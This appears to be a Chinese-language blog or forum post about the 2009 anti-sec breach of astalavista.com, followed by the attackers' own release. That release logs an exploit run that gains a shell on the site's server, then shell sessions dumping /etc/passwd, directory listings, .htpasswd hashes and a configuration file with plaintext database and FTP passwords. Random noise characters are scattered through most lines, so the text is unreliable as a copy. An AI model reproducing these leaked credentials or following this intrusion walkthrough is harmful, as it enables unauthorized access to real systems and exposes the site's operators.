里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。! l6 s p! R2 T- ?* n2 G' A
3 J r! a) u6 H; E& k[root@front3 ~]# curl -I litespeedtech.com- p& F5 G4 A1 A$ p# H6 v/ C1 v! k
HTTP/1.1 200 OK
/ ~+ ]9 M# Q5 y5 e1 e% gDate: Fri, 05 Jun 2009 22:54:51 GMT
- P/ s: M; |2 s4 r; `1 MServer: LiteSpeed+ [7 L% @0 H1 n; Q6 ~* R: r/ K5 I
! P; [ ?6 V# j: q0 P另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
$ C) i, d+ x% n) T& q8 T( e1 A6 g7 x2 |1 E% i6 k* Z! p
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
6 U/ Z b6 C7 a0 K
3 E$ Q; U4 U( ^7 a; L6 N/ K V
3 r( x! F3 \! L1 k/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
% s4 ]5 `% k4 k( W3 b$ ^) ^/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \' G! k, a8 [$ U& {5 T( _
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
" b5 `) N- `! L1 f$ S# g\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
+ |9 L( T g! h2 t d \/ \/ \/ \/ \/ \/ \// x1 ~# |! r4 B+ D
The Hacking & Security Community
( } M! j, z }; m5 q! @! _" l[+] Founded in 1997 by a hacker computer enthusiast- A# ~9 M$ \% E" ]8 d1 Y! [# O- S
[-] Exposed in 2009 by anti-sec group! [ i: K( _/ E$ T& i6 @# S) ^
/ q* k) j/ G' U! F( Y( I
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
* S, Q1 ?3 o5 D>> 03. Who’s behind the site?! i! ^0 l5 q9 \# p
>>9 \) R0 H& ?9 D, S8 B9 u( _/ }) N
>> A team of security and IT professionals, and a countless number of contributors from all over the world.6 E2 P3 C/ ~, m
1 d R0 `0 j% X
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
& M3 @9 {7 w& B) v( i3 O1 ]>>, {' P+ s: S$ u( J9 p
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
+ o0 y7 e' `9 w6 `military institutions.
/ A0 g) u( D& M! b8 z: I7 t! c>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.! o0 e& |! U' m4 T `- M1 @
9 \; x, v" u( t
Why has Astalavista been targeted?
2 J2 o* r( M! A9 ^, P* _ n# U
! I- F S1 C9 I; A- KOther than the fact that they are not doing any of this for the “community” but
% Z% n- [- }3 H& [for the money, they spread exploits for kids, claim to be a security community1 i9 g) z# |) v" F
(with no real sense of security on their own servers), and they charge you $6.66
! p" z' b4 u6 K8 q+ j2 L- o5 @8 {per months to access a dead forum with a directory filled with public releases
$ x( E; ?5 ]+ J- z) {1 |& l# kand outdated / broken services.
9 D, {: x* |. e, \7 [8 p0 r5 H+ R; K' O; W. K! l
We wanted to see how good that “team of security and IT professionals” really is.
: g6 X8 H# t7 R2 G; X X5 {8 D1 Z6 [. B; J" K8 g$ D3 P
Let’s begin.
+ C- W$ }% H3 s4 n" R" F: X) ]7 [% [
anti-sec:~# ./g0tshell astalavista.com -p 80
7 n+ U7 a# {, V3 I; _+ T[+] Connecting to astalavista.com:80# G! [& X' R/ S; X& H. N" V
[+] Grabbing banner…
! ?& A2 R( t/ V/ u# bLiteSpeed8 P6 ?/ G; N; I/ L+ t
[+] Injecting shellcode…
: O) a; {+ U) _' l0 y. _) m9 G9 J0 [[-] Wait for it- Y: K5 \3 E) M5 z) _/ K
; q3 Y: a6 n& h3 y[~] We g0tshell
" I* M+ ]) f# V+ j1 l1 j" R5 iuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux' O& I# F/ a3 b( N$ q) }9 [
ID: uid=100(apache) gid=500(apache) groups=500(apache)' D2 v1 K! o( }$ Y! t7 ^
1 l, @6 P$ B: H8 m
sh-3.2$ cat /etc/passwd
8 C1 u7 M3 |% m8 @' J H7 J Xroot:x:0:0:root:/root:/bin/bash
, o5 _5 Z& ]0 xbin:x:1:1:bin:/bin:/sbin/nologin
- U' Y }' |% R. y ^daemon:x:2:2:daemon:/sbin:/sbin/nologin
& |- t% A! H8 madm:x:3:4:adm:/var/adm:/sbin/nologin
: P- o* i/ o s6 J% U7 s8 Y9 Y- Ylp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
" S/ j7 x7 v6 d3 Wsync:x:5:0:sync:/sbin:/bin/sync
3 h( W: t( [: lshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
' U' p6 B2 b+ p0 |+ yhalt:x:7:0:halt:/sbin:/sbin/halt4 u- ]% w2 Q9 o
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin0 C7 _' J( b* y! Y4 W2 Z2 S
news:x:9:13:news:/etc/news:
5 D! M) s7 q9 juucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- {- U3 J. v2 C6 Xoperator:x:11:0 perator:/root:/sbin/nologin
/ y+ h2 J2 a& V% N+ M! }; d, D2 f( kgames:x:12:100:games:/usr/games:/sbin/nologin
( z' _/ i8 y/ D4 q# jgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
7 }2 L G* N5 `4 T$ xftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
! D" ?# L& |) D3 \- o4 Cnobody:x:99:99:Nobody:/:/sbin/nologin
9 A5 i0 P8 P3 C' Q/ p7 S# n; grpm:x:37:37::/var/lib/rpm:/sbin/nologin
9 x! w0 [- x, z# ^' ?dbus:x:81:81:System message bus:/:/sbin/nologin+ N) i' s O* |7 w
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
6 r* C# u! C5 ^mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
# I9 W" W7 L' _' `9 E5 U7 I Y3 [2 Z$ Csmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin$ N( {8 }( R" n* U. l
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
* e0 F6 `. m8 }* A0 zhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin5 [/ N4 T; Z9 A
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin, g0 }1 g* |: o+ e1 M, b
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
" D9 E; t4 b. ]/ L- `5 Vnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
4 u- B7 v5 B$ Y1 Asshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin$ l+ _/ g9 l6 \# f" B' m
pcap:x:77:77::/var/arpwatch:/sbin/nologin
6 } z+ A& C( C1 l3 Jnamed:x:25:25:Named:/var/named:/sbin/nologin
9 b7 X. v. N8 P8 wapache:x:100:500::/var/www:/bin/false( Z. k9 ^1 @3 {, k. Y
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
" r+ w Q- r" J3 Jmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
. |4 k6 }- S2 G& t0 f% Wwebapps:x:500:501::/var/www/html:/bin/bash
1 u" Q! {% [1 R2 s$ gmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash, J* Y$ `! r, A, I
admin:x:501:502::/home/admin:/bin/bash
: F7 G2 L. b" V! Djon:x:502:503::/home/jon:/bin/bash
+ U$ V; j. s9 @7 gcom:x:503:504::/home/com:/bin/bash
9 X0 X( c; \5 bntp:x:38:38::/etc/ntp:/sbin/nologin
; ], I: q+ r0 O4 Y; R7 M; @" q# nais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin! Y" h; D: [# k6 o0 k+ U+ A( W9 H
astanet:x:504:505::/home/astanet:/bin/bash& N7 {. ~) _; r$ D% g1 A
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
) n& k" r; @2 Z: G9 E: I' Tavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin1 J! u3 d4 U: o' ~, Y8 L6 U
1 }; C* P; y p) s! o/ u1 \2 X4 C% G% `sh-3.2$ cat /etc/hosts" H7 M: I& E2 h! P2 b# V
# Do not remove the following line, or various programs
) L) c, p. G, D: g& M# that require network functionality will fail.
, X L9 [6 Q9 D% J! y127.0.0.1 localhost.localdomain localhost
5 k" |% Z# l+ V::1 localhost6.localdomain6 localhost6$ o0 f5 E# Z* p9 D6 J! o
80.74.154.172 asta1.astalavistaserver.com- H$ b* }4 b4 E+ _, R% q, y
- s: ]# k1 C/ ?9 C2 W8 }$ h( [
sh-3.2$ pwd6 V2 y; n, b1 r
/home/com/public_html
8 a! O, V" q$ J0 y5 V
" T' i3 Z; k) msh-3.2$ ls -la
. {! S! Y. W" R7 x! S; Ftotal 18460: b, U$ q+ d( S0 ]5 H+ |) |* U
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
( Q* {8 T: M! a; I9 q U! G; Fdrwx–x–x 11 com com 4096 Jun 25 2008 ..
0 o7 y6 d8 q$ K; K/ t1 F/ idrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
* L. J. i# b! [2 b* c$ Y% y3 ~8 m' K1 Fdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
8 n2 j/ b& z2 J& u: Gdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
, c4 J% C' \) W" `3 xdrwxrwxrwx 2 com com 4096 May 19 00:50 config
5 ^* n" S, f. ~% |! Zdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core4 C1 A* A' d, q# h
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
+ }/ b8 L) y7 H: h3 tdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing' B U9 \6 z+ h p
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
% S2 P. \$ t; x& F! L& Q3 L4 Ydrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__7 f/ k$ G1 {% A' R
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
+ f3 s4 Q5 S, c9 O% ?! mdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd: k( B L0 {% _0 o6 G4 F
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
2 @2 J' ]3 i+ S* O% K/ T-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
1 D1 h3 Y& R2 _3 w/ E7 ?drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed; e# [, Z" i" @0 `; ~6 f
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
' V* X# S* J* W: w( x-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak( j9 C' R' w/ n0 f( h
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
( Q6 w6 D- r" B% p- M2 \7 T: W- H) Mdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
. f6 p4 f. o5 {6 ^ Ldrwxrwxrwx 14 com com 4096 Feb 2 19:29 images: ]& t' ` G' U8 d9 H
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
6 L4 p/ \; [" L% q- Tdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer+ \( _' O; z* p* W4 m
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
& V) w1 b% v* p% [) Odrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib5 ?! H; {! E8 T; B' z) O
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media# J5 E1 Z* U* N& `. s& G
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
4 F5 R% @) b; s; s* @9 ^drwxr-xr-x 34 com com 4096 May 28 16:30 modules
# M' L8 C. m. j8 ~, }$ hdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
( d1 E( K4 G0 J Y. R# rdrwxrwxr-x 22 com com 4096 May 28 17:06 _new! P. J! \2 s V6 T% F& o/ |9 H/ g3 G
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old( e9 K& h0 D' J
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy& R( f$ u& I' \$ ~* R+ W
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy- n2 [- `. H- g
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
* g7 \' }8 F5 j7 Y# O* c-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
5 }( l4 b) f R4 u6 T- E-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
% B" j+ D- K6 N0 {9 W# A. D" H: pdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes$ {0 g3 W0 B+ t' I7 Q
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp+ C6 b n" w, x: W2 H5 ^' a( r
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
/ g4 r3 w( T; [6 t6 l
0 f6 j5 b3 u4 [sh-3.2$ head -20 index.php8 X2 i: c' T, `& V
<?php# ?2 A" i! a) c3 a6 n. [
* d) g% D2 ?# ]% t3 }' K' ^/**. V2 R: k; g! n
* The main page for the CMS
: R X) G6 |& G5 ^% v3 Q* @copyright CONTREXX CMS - COMVATION AG
0 T( _9 V- P J% A& P* @author Comvation Development Team
! m8 f5 a2 }! K, L5 m$ p$ _* @version v1.0.9.10.1 stable4 l( b2 w4 K/ G' F+ ?" D
* @package contrexx- K) O# A$ i9 Z$ N U
* @subpackage core
- w6 g1 }6 u/ ~* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage {0 [8 _ V4 O; l8 r, W5 C- _3 k, R
* @since v0.0.0.0
" ~* m0 W" g2 J# j& a# h* @todo Capitalize all class names in project. L- y2 t$ {1 @. f
* @uses /config/configuration.php0 B( R0 W% E3 I/ Y# d0 t- f# ?
* @uses /config/settings.php
J2 z9 P0 V. I. q _1 @7 E( q* @uses /config/version.php
- i6 f1 E( P% Y* @uses /core/API.php
; e' f+ p9 @( S7 o# l* @uses /core_modules/cache/index.class.php! r6 x# P/ v) i- V
* @uses /core/error.class.php
9 |7 S7 r9 J$ T& z* @uses /core_modules/banner/index.class.php* b& a+ Z9 r, g* @2 C& m4 C/ y
* @uses /core_modules/contact/index.class.php0 w; A5 I3 o+ a7 T7 U+ @
6 Q0 I9 o) A, n& vsh-3.2$ cd config/7 V7 C7 s' S* V: O! O) {
sh-3.2$ ls -la- m% @+ C) p' r% M- U; o
total 32
4 o" }0 E8 E# v7 G% G" R/ cdrwxrwxrwx 2 com com 4096 May 19 00:50 .
, H8 X) p: d3 n* e# i! B: Z. Idrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
) @! X) Z9 ?. J8 ^-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php7 I% P. ^8 B5 z% P' j5 z
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php4 Y7 d6 d' M! l, e1 c
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php* @6 g6 U% G5 m, f5 {
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php" g J. t6 x$ f
& u) d' j* E, r) Z7 S8 u$ Z; V8 @sh-3.2$ cat configuration.php3 o5 a' b2 M. j$ u) ?
[snip]5 u$ m; \, M" n: J: P) J
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
) H7 o4 J6 L: w. N N5 E( ^0 l$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name& s1 R) X' B* B% }
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
7 Q u; L6 I7 ~5 P6 Q6 F4 k$ r$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
8 {7 c+ N, m! I6 v/ a! ]$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
. V% A% M# K- x$ |0 P& s: ^/ d$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)# z7 }8 A% b" u" x& f8 E
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)& e5 g- V" Z) X2 Y4 @ l$ N$ b
[snip]
( Z/ o( w4 c+ B- ?) R" X$_FTPCONFIG['is_activated'] = true; // Ftp support true or false- f" T% F9 F2 y& B
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode4 t9 I `! @! _7 o
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
5 ~& @4 T, C' C1 g: Z$_FTPCONFIG['port'] = 21; // Ftp remote port
( e. E4 E6 w; x; i4 N6 W2 Y$ b$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
& E4 _- e* w% n5 i& _$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password/ J2 e7 b( N0 G
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
3 D" g. ]: ~! {- ?" |6 Q4 f& t4 ?5 {0 ]7 q$ t
sh-3.2$ cd ..
2 g* S( `2 g- n6 ksh-3.2$ cd dvd/, I# l5 y! W4 x1 G" p) u8 ?
sh-3.2$ ls -la
6 o* ?* l$ a7 {8 ^total 2913780
4 d5 s1 Y2 J& q5 g7 f9 @- B/ Rdrwxr-xr-x 2 com com 4096 Sep 9 2008 .3 ?) z6 G: @ X4 w' m: W# Z; i+ F2 v
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..0 Z3 P3 z% q5 K* @! Y
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar7 y) D. x1 W" q
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
R, O# ~* C- Y Q-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
Y3 J( F3 E9 ^6 W3 R-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
) \! T" Z* @9 S, d1 M) M# o& }8 F( i" q' W9 l' T5 r, T/ F
sh-3.2$ cat .htaccess1 S" F4 l# h8 Z
authType Basic
" h- q. P& j0 Z- a- pauthName DVD( J' F3 Q, O1 H- g% s
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
3 }' K9 Q$ y8 N& m+ O. ?( ^+ G4 Mrequire valid-user& l" A5 [" k+ n' r0 N( j6 `* h
6 s. Y4 ~2 x1 R/ ~; j( qsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd3 P8 e% Y9 D5 a0 G# E4 I- Q
DVDdownload:CRD8cuY6.MPT6
$ k( z; u0 S: p* ]2 ]/ t6 i3 hDVDdownload2:CR8a36.wluFMg6 d, ~. Z" e3 l9 g
) l* E3 ^9 t- }sh-3.2$ cat test.php; | c. @7 w6 H$ ^, W6 R8 E4 g
<?php+ R. H. h3 g0 M* t2 b5 }
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
7 ~6 U4 k+ P' K; p' {$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
% | U3 i6 f4 X; U; Eecho $url;
! J# K4 M1 `6 Y) q0 {+ L5 i?>
I& [9 p. ?3 g9 D2 E; s3 J
: ?% b3 m- q3 ysh-3.2$ cd modifications/
; _6 ~ O6 o, i+ qsh-3.2$ ls -la: M6 X( Q& n2 ~2 }; ]& N/ N
total 32
; S3 ?: C n3 O: |& Tdrwxr-xr-x 8 com com 4096 May 11 12:48 . E B( n. o4 I7 }& L
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
5 ~8 w: J' g" X0 Q1 i8 A7 H9 O9 Adrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng9 r' j+ @& h9 x9 O9 n
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
+ _5 q P& O5 c. l" j5 S* H" Edrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
$ I* \) b2 W8 i- ^: }% \; }7 {drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc, g n% _) c$ P9 n4 b
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search0 H, }: f" @* p% L$ `8 k Z+ R
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
9 | r$ I0 T5 F* H) c& l( L8 |; v/ H, i9 {$ M6 r
sh-3.2$ ls -R0 H* A) z" k. A! G' ~4 F, B
.:
' Z( Y- I4 S! q! T$ w3 p( H' I( Wcom_avtng cronjobs onlinetools pjirc search _tmp
|2 \- f) N2 m( q' D
7 B3 e' P# W: z: a0 N3 O. r: R8 E./com_avtng:) ^8 B0 B7 j) g* q' b; A# ^
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts" G* D9 {! |5 k- [) S! Q' x& A4 @
% g' c+ X5 [0 Y& x0 a) z
./com_avtng/scripts:
9 }) g/ p! f! J3 S3 Rpopunder.js+ P/ l( w( V9 _8 h2 x; u9 p
8 o+ Z1 F6 Y- K+ s, `) K./cronjobs:' A2 n1 K& u8 E0 E* @: t
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
. I k% ?/ P# p \
* |' ^6 h1 }" m( Q, @/ r9 V./cronjobs/tmp:4 B: ~3 x7 m- ~& w( u: U
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv% I0 r+ a2 l( {, w& s& B8 f \8 g3 `
- a4 b1 C, \4 t- w4 q h" @# p( Z./onlinetools:) I, W2 m3 X0 H0 [, ~
index.php
* \8 h/ K& R' A9 {
: R% I* F3 H0 v' m" y. _) D+ y./pjirc:& `7 @4 F, c) r s4 r
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt( _9 N& B0 O! ]5 L7 T- b
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt, p$ s! J! ]( U2 a7 l& J
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
4 g2 _- a' _' H; |# B
2 f. l2 y6 Z T4 B0 ]5 a./pjirc/img:
# q" f: i( m% i3 M" _' \2 _ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif( y% d- x% m7 ?; _
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
; R _2 L- u; j+ ~) _7 Everre-eau.gif1 u, _9 _7 w L# O. ^& J/ e) W
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
4 `- |0 K9 R/ v1 j5 L, k. }verre-vin.gif
: }. _% V: ~2 rballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
8 a- ^) u& t& p6 |% q8 ]9 Ibiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif( ^3 p$ S9 r& p
3 X( J. z( |2 M# {6 w& a./pjirc/snd:2 ?+ {/ v1 M" c* x8 I% h
bell2.au ding.au
* _% h% i& i9 y% ~
' ^* h# N! S: U. A2 e./search: k9 w/ [# B' E
searchEngines.php search.php8 z Q2 o2 ]7 E3 T1 _/ K4 V
6 K3 T9 W$ ~! T
./_tmp:# Z- _* J: S9 M! m3 @$ H
defaultPorts.php defaultPorts.txt
% C) C# N: Z3 b) e2 K) y' z/ _3 l3 g: P5 g8 c/ y: ~* y- v
sh-3.2$ cd cronjobs/
- }! h, f9 e4 l6 ssh-3.2$ cat exploits.php
8 D8 I" c1 `* S[snip] l7 W3 x/ a- M4 \4 k2 B% V
$categories = array();. F7 Q) s$ E: ~/ E
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
/ @6 n! i' |) W; N+ _9 N8 y+ k6 e$expolits = file($milw0rmFile); n2 S) m7 n& z8 {: t
$comExploits = array();, N* g' t- g; r2 P- w
[snip]8 U+ x; N* U7 Y2 |" b0 [* y
// manage data
% P3 i! h2 N6 Afor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640+ Z$ h4 r5 \3 W3 M0 m
! K+ a" J8 M0 @) M8 { U4 F1 R# m // get path and title: i% n' i2 M1 a* q5 g/ [" H- p
$expolits[$x] = trim($expolits[$x]);* H8 Z' B% M8 F& X5 A
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
2 q! G% n1 C/ P5 I $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
, y' V9 A# P2 @& }# v4 J0 ]; U; } [% o" l& D( @. N
// check if file exists7 o9 f1 `( a" h8 E' ^3 I
if (file_exists($path)) {
' y0 J+ ^0 p$ | V& Y5 v0 r. S9 ~, Y% X u. w8 V
$text = file_get_contents($path);
: B( ^. l5 I8 f2 ]" ]& T) b8 l" T, [9 |+ a8 j! P
// get content and date7 [5 g$ r" G) [" C
//$text = htmlspecialchars($text, ENT_QUOTES);
- G8 h+ Q) G& y $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));4 h! p& I: X# o) I6 q
if ($tmptext != ”) {3 |3 U% J' N& D) D) L0 o2 t
$text = $tmptext;
0 f% B( Z" Z; g: t8 _ } else {
6 g; q. |# t$ r2 ]- ? $text = addslashes(htmlentities($text, ENT_QUOTES));' Q+ E2 Q7 w- K/ W; e
}6 m/ B- T) \' g$ q4 G6 F1 D3 z
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));7 a+ ~- C/ `9 @; v9 F) V0 t
$tmp = explode('-', $date);
2 {* M7 k6 w8 K1 [8 |( o $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
. Z* E; e3 Y8 A8 e2 R $cat = getCategory ($path);
A* V. `5 E/ J- } $ext = pathinfo(basename($path));
' M1 |( I. @# P( `9 z, x+ G $ext = $ext['extension'];5 N1 k) K6 `& |' q9 y
$qStr = ”- b/ \5 G5 ]0 W* S2 C
SELECT `id`
* @1 Y3 a: l/ J. Y8 { FROM `contrexx_module_exploits`# ?. ~; g" M" J% x
WHERE `title` = ‘” . $title . “‘6 {. {3 S7 Y, s7 m
AND `date` = ‘” . $date . “‘0 Z: ?/ F9 s6 ?0 H' P1 |" C
“;: J2 y5 W7 f# ^9 v f" c( o9 J0 Z
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
. _' y9 v$ B# t3 L $q = $_objDB->query($qStr);7 A4 H8 c- B& |7 _1 q9 y6 O5 U
; \2 X5 @: w1 c; c if ($q->numRows() == 0) {2 x( }% C! @, F' F8 B/ I5 I: X
( E7 L9 z: ^1 I# N9 y$ R // prepare array
7 Q) c% b9 T+ F! b8 f $comExploits[$x]['date'] = $date;' G- O3 n+ G w2 v9 n
$comExploits[$x]['title'] = $title;7 W% P- l* t, a, C) Q! N
$comExploits[$x]['author'] = ‘milw0rm’;+ s! V3 X& @2 @) q4 J
$comExploits[$x]['text'] = $text;
8 V9 a9 Y4 H- o% y& x# { $comExploits[$x]['source'] = $ext;$ h: R9 s T! D
$comExploits[$x]['url1'] = ”;
% p: o* j4 w$ G4 \, e $comExploits[$x]['url2'] = ”;
0 Y( [! _6 c2 U8 T; e& w $comExploits[$x]['catid'] = $cat;
5 \! b. I; Q E/ U% T $comExploits[$x]['lang'] = ‘2′;
$ {9 N; K2 Q: S8 @ $comExploits[$x]['userid'] = ‘12′;
4 M! ]3 _! K/ G: U) p $comExploits[$x]['startdate'] = ‘0000-00-00′;
6 L2 H ?5 r2 t; ?2 c $comExploits[$x]['enddate'] = ‘0000-00-00′;
3 q+ {, ^7 T. U! P1 j2 Y/ _ $comExploits[$x]['status'] = ‘1′;
1 ~# B3 Z) z: F: w* y8 P. G $comExploits[$x]['changelog'] = $date;
: U6 V2 I3 m# ?7 ^* }
; y s% c* k1 [$ U* x }
r, }# F+ p/ }[snip]
! k/ s$ o7 E# s, O6 G% A $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
* s; w! I$ _% I2 R* W<rss version=”2.0″> E. g$ A( |* W( K
<channel>/ b8 ?& F) b. a7 n0 f% z3 q1 g! \
<title>ASTALAVISTA.com - Exploits</title>
' |' y& E( t& ^- I- j. W! [ F <link>http://www.astalavista.com/exploits</link>
/ V9 |2 i: l6 i: q" j <description>All availably Exploits.</description>1 ^1 I3 x$ c! r9 o" B
